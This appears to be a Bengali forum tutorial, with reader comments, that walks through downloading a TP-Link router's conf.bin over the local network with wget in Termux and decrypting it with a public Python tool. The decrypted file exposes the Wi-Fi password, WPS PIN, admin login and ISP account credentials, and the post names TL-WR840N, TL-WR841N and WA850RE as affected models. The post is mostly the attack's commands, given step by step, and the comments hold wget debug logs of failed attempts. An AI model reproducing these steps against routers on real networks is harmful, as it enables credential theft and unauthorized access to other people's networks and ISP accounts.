Howdy,
কেমন আছেন সবাই আশা করি ভালো আছেন। বরাবরের মতো আজকেও হাজির হলাম নতুন কিছু নিয়ে, তো আজকের আলোচনার টপিক কি সেটা হয়তো টাইটেল দেখে বুঝতে পারছেন চলুন শুরু করা যাক।
tp link এর conf.bin নিয়ে এক ভাইয়ের পোস্ট আছে চাইলে সেটা দখতে পারেন ।
এই পোস্টে বিস্তারিত বলা আছে বলে আমি তেমন কিছু বলবো না। কারণ আপনারা আমাদের লেখা গুলো না পরে শ স্কিনসর্ট গুলো চলে যায় ।
আজকে termux দিয়ে কিভাবে conf.bin ডাউনলোড করতে হয় সেটা দেখাবো সাথে যে ফাইলটি থাকবে সেটাকেও decrypt করবো তো চলুন শুরু করা যায় ।
বরাবরের মতো termux কে আপডেট করে নিবো।
pkg update -y
এখন গিট প্যাকেজ ইনস্টল দিবো।
pkg install git -y
Then wget প্যাকেজটি ইনস্টল দিবো। যেহেতু আমাদের ফাইলটি wget দিয়ে ডাউনলোড করবো ।
pkg install wget -y
এখন পাইথন প্যাকেজটি ইনস্টল দিবো । আমাদের decrypt করার টুলসটি পাইথন দিয়ে করা।
pkg install python -y
Conf.bin ফাইল decrypt করার জন্য দুইটি module লাগবে ।
pip install pycryptodome
এখন আমরা যে রাউটারের conf.bin ডাউনলোড করবো সেই রাউটারে কানেক্টেড হবো। এবং আমার দেওয়া কমান্ড কপি করে পেস্ট করে দিবেন ।
কমান্ট দেওয়া যাচ্ছে না তাই txt ফাইলে দিলাম
Download
মূল কথা হচ্ছে যারা লগইন আইপি পরিবর্তন করে রাখেন তাহলে পরিবর্তন করে যে আইপি দিছেন ঠিক সেইম আইপি দিতে হবে ।
মূল এখানে আপনার রাউটারের আইপটা দিবে। http://192.168.0.1/CGI/conf.bin সব ঠিক থাকবে শুধু আইপটা পরিবর্তন করবেন ,যদি আইপি পরিবর্তন থাকে তাহলে ।
কমান্ড রান করার সাথে সাথে এই রকম ইন্টার ফেইজ পাবেন দেখেন মার্ক করা আছে saving to : conf.bin ফাইল ডাউনলোড হয়েছে। যাদেরটা হবে না তাদের টা একটু অন্য রকম আসবে ।
এখন ls দিবো তাহলে দেখতে পারো conf.bin পেয়েছি কিনা।
এখন আমরা termux কে স্টোরেজ পারমিশন দিয়ে নিবো।
এখন conf.bin ফাইলটিকে ফোনে নিয়ে যাবো তার জন্য লিখবো
cp conf.bin /sdcard/
দেখতে পাচ্ছেন আমার ফোনে চলে আচ্ছে ।এখন আমাদের কাজ ফাইলটাকে decrypt করা।
এখন গিটহাব থেকে একটি টুলস ডাউনলোড দিবো ।
git clone https://github.com/sta-c0000/tpconf_bin_xml
এখন ls দিবো এবং ডাউনলোড করা ফোল্ডারের ভিতরে প্রবেশ করবো।
cd tpconf_bin_xml
এখন আমরা টুলসটি করবো এবং ফাইলটি decrypt করবো ।
python tpconf_bin_xml.py /sdcard/conf.bin 1.xml
Python পরে টুলসটির নাম থাকবে তারপর আমাদের ফাইলটি কোথায় আছে সেই location টা দিবো এবং আমরা কোন ফরমেটে decrypt করবো সেই ফরমেটের নাম দিবো ।
এখানে পাইথন টুলস
/sdcard/conf.bin এইটা আমাদের conf.bin ফাইলের লোকেশন
1.XML হচ্ছে যে ফরমেটে decrypt করবো ।
উপরে টুলসটি রান করার পর যাদের এই রকম error আসবে তাদের জন্য 2 নাম্বার module টা ইনস্টল করতে হবে। 
২ নাম্বার module ইনস্টল দিবো।
pip install pycryptodomex
আবার ও আগের কমান্ড টি রান করবো তাহলে আর error আসবে না।
দেখতে পাচ্ছেন decrypt হয়ে গেছে । এখন ls দিবো তাহলে 1.XML নামে একটা ফাইল দেখতে পারবো ।
এখন আমরা 1.XML extract করবো তার জন্য লিখবো
cat 1.xml
Extract হলে এই রকম দেখতে পারো ।এখানে রাউটারের সব কিছু পেয়ে যাবে। প্রথম ছবি টা দেখেন এখানে কোন user name or pass নাই কারণ আমার রাউটেরর login panel যে default user or pass আছে সেটাই কোন পরিবর্তন করা হয়নি তাই এখানে কিছু আসে নাই।
যাদেরটা পরিবর্তন করা হবে তাদেরটা এখানে দেখতে পারবেন ।
দুই নাম্বার ছবিতে আমার রাউটারে wifi পাসওয়ার্ড এবং wps pin
মার্ক করা user or pass এইটা হচ্ছে আইএসপি user pass যার সাহায্যে আমরা নেট কানেকশন পাই।
তো দেখতেই পেলেন খুব সহজে একটি রাউটারের সব কিছু দেখতে পেলাম এই পোস্টের ভিডিওটি YouTube আপডেট করা হচ্ছে না চাইলে আপনারা আমার পেইজ থেকে দেখতে পারেন।
এই মেডট সব রাউটারে কাজ করবে না নিচের দেওয়া গুলোতে কাজ করবে ।
- TL-WR840N
- TL-WR841N
Some Other Routers of TP-LINK are also vulnerable of a similar kind of attack
- WL-WA850RE
তো আজ এই পর্যন্তই ভালো থাকবেন সুস্থ থাকবেন আল্লাহ হাফেজ ।
?
https://pasteboard.co/4Z1U7yGaDCmu.jpg
Setting –header (header) to User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Setting –header (header) to Referer: http://192.168.0.1/mainFrame.htm
Setting –header (header) to Accept-Encoding: compress, gzip
DEBUG output created by Wget 1.21.4 on linux-android.
Reading HSTS entries from /data/data/com.termux/files/home/.wget-hsts
URI encoding = ‘UTF-8’
Converted file name ‘conf.bin’ (UTF-8) -> ‘conf.bin’ (UTF-8)
–2023-06-25 09:38:43– http://192.168.0.1/cgi/conf.bin
Connecting to 192.168.0.1:80… connected.
Created socket 3.
Releasing 0xb40000762a609100 (new refcount 0).
Deleting unused 0xb40000762a609100.
—request begin—
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Accept: */*
Accept-Encoding: compress, gzip
Connection: Keep-Alive
Referer: http://192.168.0.1/mainFrame.htm
—request end—
HTTP request sent, awaiting response…
—response begin—
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 106
Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
Connection: close
—response end—
404 Not Found
URI content encoding = ‘utf-8’
Closed fd 3
2023-06-25 09:38:43 ERROR 404: Not Found.
এই error আসে?
amon akta post korean plz
Realmi c12
404 Not Found
URI content encoding = ‘utf-8’
Closed fd 3
2023-06-27 19:51:08 ERROR 404: Not Found.
এইরকম আসতেছে
404 Not Found
URI content encoding = ‘utf-8’
Closed fd 3
2023-06-27 19:51:08 ERROR 404: Not Found.
এই সমস্যা ভাই